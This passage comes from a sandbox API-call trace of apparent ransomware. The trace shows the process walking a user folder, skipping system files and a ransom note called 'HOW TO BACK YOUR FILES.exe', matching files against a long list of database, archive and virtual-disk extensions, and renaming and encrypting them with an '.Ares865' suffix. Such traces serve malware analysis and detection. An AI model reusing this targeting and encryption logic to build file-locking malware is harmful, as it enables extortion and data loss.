lpString2="sdf") returned -1 [0063.398] lstrlenW (lpString="sis") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0063.398] lstrlenW (lpString="spq") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0063.398] lstrlenW (lpString="te") returned 2 [0063.398] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0063.398] lstrlenW (lpString="teacher") returned 7 [0063.398] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0063.398] lstrlenW (lpString="tmd") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0063.398] lstrlenW (lpString="tps") returned 3 [0063.398] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0063.399] lstrlenW (lpString="trc") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0063.399] lstrlenW (lpString="trc") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0063.399] lstrlenW (lpString="trm") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0063.399] lstrlenW (lpString="udb") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0063.399] lstrlenW (lpString="udl") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0063.399] lstrlenW (lpString="usr") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0063.399] lstrlenW (lpString="v12") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0063.399] lstrlenW (lpString="vis") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0063.399] lstrlenW (lpString="vpd") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0063.399] lstrlenW (lpString="vvv") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0063.399] lstrlenW (lpString="wdb") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0063.399] lstrlenW (lpString="wmdb") returned 4 [0063.399] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0063.399] lstrlenW (lpString="wrk") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0063.399] lstrlenW (lpString="xdb") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0063.399] lstrlenW (lpString="xld") returned 3 [0063.399] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0063.399] lstrlenW (lpString="xmlff") returned 5 [0063.399] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0063.399] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865") returned 90 [0063.399] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0063.401] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.401] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=645) returned 1 [0063.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.402] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.402] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.403] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x590, lpName=0x0) returned 0x164 [0063.404] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x590) returned 0x190000 [0063.405] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.405] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.405] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.406] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.406] CloseHandle (hObject=0x164) returned 1 [0063.406] CloseHandle (hObject=0x154) returned 1 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.407] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x650f7e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x650f7e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="aoldtz.exe") returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2=".") returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="..") returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="windows") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="bootmgr") returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="temp") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="pagefile.sys") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="boot") returned 1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="ids.txt") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="ntuser.dat") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="perflogs") returned -1 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2="MSBuild") returned -1 [0063.407] lstrlenW (lpString="Garden.htm") returned 10 [0063.407] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 82 [0063.407] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Garden.htm" | out: lpString1="Garden.htm") returned="Garden.htm" [0063.407] lstrlenW (lpString="Garden.htm") returned 10 [0063.407] lstrlenW (lpString="Ares865") returned 7 [0063.407] lstrcmpiW (lpString1="den.htm", lpString2="Ares865") returned 1 [0063.407] lstrlenW (lpString=".dll") returned 4 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2=".dll") returned 1 [0063.407] lstrlenW (lpString=".lnk") returned 4 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2=".lnk") returned 1 [0063.407] lstrlenW (lpString=".ini") returned 4 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2=".ini") returned 1 [0063.407] lstrlenW (lpString=".sys") returned 4 [0063.407] lstrcmpiW (lpString1="Garden.htm", lpString2=".sys") returned 1 [0063.407] lstrlenW (lpString="Garden.htm") returned 10 [0063.407] lstrlenW (lpString="bak") returned 3 [0063.407] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.407] lstrlenW (lpString="ba_") returned 3 [0063.407] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.408] lstrlenW (lpString="dbb") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.408] lstrlenW (lpString="vmdk") returned 4 [0063.408] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.408] lstrlenW (lpString="rar") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.408] lstrlenW (lpString="zip") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.408] lstrlenW (lpString="tgz") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.408] lstrlenW (lpString="vbox") returned 4 [0063.408] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.408] lstrlenW (lpString="vdi") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.408] lstrlenW (lpString="vhd") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.408] lstrlenW (lpString="vhdx") returned 4 [0063.408] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.408] lstrlenW (lpString="avhd") returned 4 [0063.408] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.408] lstrlenW (lpString="db") returned 2 [0063.408] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.408] lstrlenW (lpString="db2") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.408] lstrlenW (lpString="db3") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.408] lstrlenW (lpString="dbf") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.408] lstrlenW (lpString="mdf") returned 3 [0063.408] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.408] lstrlenW (lpString="mdb") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.409] lstrlenW (lpString="sql") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.409] lstrlenW (lpString="sqlite") returned 6 [0063.409] lstrcmpiW (lpString1="en.htm", lpString2="sqlite") returned -1 [0063.409] lstrlenW (lpString="sqlite3") returned 7 [0063.409] lstrcmpiW (lpString1="den.htm", lpString2="sqlite3") returned -1 [0063.409] lstrlenW (lpString="sqlitedb") returned 8 [0063.409] lstrcmpiW (lpString1="rden.htm", lpString2="sqlitedb") returned -1 [0063.409] lstrlenW (lpString="xml") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.409] lstrlenW (lpString="$er") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.409] lstrlenW (lpString="4dd") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.409] lstrlenW (lpString="4dl") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.409] lstrlenW (lpString="^^^") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.409] lstrlenW (lpString="abs") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.409] lstrlenW (lpString="abx") returned 3 [0063.409] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.409] lstrlenW (lpString="accdb") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accdb") returned 1 [0063.409] lstrlenW (lpString="accdc") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accdc") returned 1 [0063.409] lstrlenW (lpString="accde") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accde") returned 1 [0063.409] lstrlenW (lpString="accdr") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accdr") returned 1 [0063.409] lstrlenW (lpString="accdt") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accdt") returned 1 [0063.409] lstrlenW (lpString="accdw") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accdw") returned 1 [0063.409] lstrlenW (lpString="accft") returned 5 [0063.409] lstrcmpiW (lpString1="n.htm", lpString2="accft") returned 1 [0063.409] lstrlenW (lpString="adb") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.410] lstrlenW (lpString="adb") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.410] lstrlenW (lpString="ade") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.410] lstrlenW (lpString="adf") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.410] lstrlenW (lpString="adn") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.410] lstrlenW (lpString="adp") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.410] lstrlenW (lpString="alf") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.410] lstrlenW (lpString="ask") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.410] lstrlenW (lpString="btr") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.410] lstrlenW (lpString="cat") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.410] lstrlenW (lpString="cdb") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.410] lstrlenW (lpString="ckp") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.410] lstrlenW (lpString="cma") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.410] lstrlenW (lpString="cpd") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.410] lstrlenW (lpString="dacpac") returned 6 [0063.410] lstrcmpiW (lpString1="en.htm", lpString2="dacpac") returned 1 [0063.410] lstrlenW (lpString="dad") returned 3 [0063.410] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.410] lstrlenW (lpString="dadiagrams") returned 10 [0063.410] lstrlenW (lpString="daschema") returned 8 [0063.410] lstrcmpiW (lpString1="rden.htm", lpString2="daschema") returned 1 [0063.410] lstrlenW (lpString="db-journal") returned 10 [0063.411] lstrlenW (lpString="db-shm") returned 6 [0063.411] lstrcmpiW (lpString1="en.htm", lpString2="db-shm") returned 1 [0063.411] lstrlenW (lpString="db-wal") returned 6 [0063.411] lstrcmpiW (lpString1="en.htm", lpString2="db-wal") returned 1 [0063.411] lstrlenW (lpString="dbc") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.411] lstrlenW (lpString="dbs") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.411] lstrlenW (lpString="dbt") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.411] lstrlenW (lpString="dbv") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.411] lstrlenW (lpString="dbx") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.411] lstrlenW (lpString="dcb") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.411] lstrlenW (lpString="dct") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.411] lstrlenW (lpString="dcx") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.411] lstrlenW (lpString="ddl") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.411] lstrlenW (lpString="dlis") returned 4 [0063.411] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.411] lstrlenW (lpString="dp1") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.411] lstrlenW (lpString="dqy") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.411] lstrlenW (lpString="dsk") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.411] lstrlenW (lpString="dsn") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.411] lstrlenW (lpString="dtsx") returned 4 [0063.411] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.411] lstrlenW (lpString="dxl") returned 3 [0063.411] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.411] lstrlenW (lpString="eco") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.412] lstrlenW (lpString="ecx") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.412] lstrlenW (lpString="edb") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.412] lstrlenW (lpString="epim") returned 4 [0063.412] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.412] lstrlenW (lpString="fcd") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.412] lstrlenW (lpString="fdb") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.412] lstrlenW (lpString="fic") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.412] lstrlenW (lpString="flexolibrary") returned 12 [0063.412] lstrlenW (lpString="fm5") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.412] lstrlenW (lpString="fmp") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.412] lstrlenW (lpString="fmp12") returned 5 [0063.412] lstrcmpiW (lpString1="n.htm", lpString2="fmp12") returned 1 [0063.412] lstrlenW (lpString="fmpsl") returned 5 [0063.412] lstrcmpiW (lpString1="n.htm", lpString2="fmpsl") returned 1 [0063.412] lstrlenW (lpString="fol") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.412] lstrlenW (lpString="fp3") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.412] lstrlenW (lpString="fp4") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.412] lstrlenW (lpString="fp5") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.412] lstrlenW (lpString="fp7") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.412] lstrlenW (lpString="fpt") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.412] lstrlenW (lpString="frm") returned 3 [0063.412] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.412] lstrlenW (lpString="gdb") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.413] lstrlenW (lpString="gdb") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.413] lstrlenW (lpString="grdb") returned 4 [0063.413] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.413] lstrlenW (lpString="gwi") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.413] lstrlenW (lpString="hdb") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.413] lstrlenW (lpString="his") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.413] lstrlenW (lpString="ib") returned 2 [0063.413] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.413] lstrlenW (lpString="idb") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.413] lstrlenW (lpString="ihx") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.413] lstrlenW (lpString="itdb") returned 4 [0063.413] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.413] lstrlenW (lpString="itw") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.413] lstrlenW (lpString="jet") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.413] lstrlenW (lpString="jtx") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.413] lstrlenW (lpString="kdb") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.413] lstrlenW (lpString="kexi") returned 4 [0063.413] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.413] lstrlenW (lpString="kexic") returned 5 [0063.413] lstrcmpiW (lpString1="n.htm", lpString2="kexic") returned 1 [0063.413] lstrlenW (lpString="kexis") returned 5 [0063.413] lstrcmpiW (lpString1="n.htm", lpString2="kexis") returned 1 [0063.413] lstrlenW (lpString="lgc") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.413] lstrlenW (lpString="lwx") returned 3 [0063.413] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.413] lstrlenW (lpString="maf") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.414] lstrlenW (lpString="maq") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.414] lstrlenW (lpString="mar") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.414] lstrlenW (lpString="marshal") returned 7 [0063.414] lstrcmpiW (lpString1="den.htm", lpString2="marshal") returned -1 [0063.414] lstrlenW (lpString="mas") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.414] lstrlenW (lpString="mav") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.414] lstrlenW (lpString="maw") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.414] lstrlenW (lpString="mdbhtml") returned 7 [0063.414] lstrcmpiW (lpString1="den.htm", lpString2="mdbhtml") returned -1 [0063.414] lstrlenW (lpString="mdn") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.414] lstrlenW (lpString="mdt") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.414] lstrlenW (lpString="mfd") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.414] lstrlenW (lpString="mpd") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.414] lstrlenW (lpString="mrg") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.414] lstrlenW (lpString="mud") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.414] lstrlenW (lpString="mwb") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.414] lstrlenW (lpString="myd") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.414] lstrlenW (lpString="ndf") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.414] lstrlenW (lpString="nnt") returned 3 [0063.414] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.415] lstrlenW (lpString="nrmlib") returned 6 [0063.415] lstrcmpiW (lpString1="en.htm", lpString2="nrmlib") returned -1 [0063.415] lstrlenW (lpString="ns2") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.415] lstrlenW (lpString="ns3") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.415] lstrlenW (lpString="ns4") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.415] lstrlenW (lpString="nsf") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.415] lstrlenW (lpString="nv") returned 2 [0063.415] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.415] lstrlenW (lpString="nv2") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.415] lstrlenW (lpString="nwdb") returned 4 [0063.415] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.415] lstrlenW (lpString="nyf") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.415] lstrlenW (lpString="odb") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.415] lstrlenW (lpString="odb") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.415] lstrlenW (lpString="oqy") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.415] lstrlenW (lpString="ora") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.415] lstrlenW (lpString="orx") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.415] lstrlenW (lpString="owc") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.415] lstrlenW (lpString="p96") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.415] lstrlenW (lpString="p97") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.415] lstrlenW (lpString="pan") returned 3 [0063.415] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.415] lstrlenW (lpString="pdb") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.416] lstrlenW (lpString="pdm") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.416] lstrlenW (lpString="pnz") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.416] lstrlenW (lpString="qry") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.416] lstrlenW (lpString="qvd") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.416] lstrlenW (lpString="rbf") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.416] lstrlenW (lpString="rctd") returned 4 [0063.416] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.416] lstrlenW (lpString="rod") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.416] lstrlenW (lpString="rodx") returned 4 [0063.416] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.416] lstrlenW (lpString="rpd") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.416] lstrlenW (lpString="rsd") returned 3 [0063.416] lstrcmpiW (lpString1="htm", 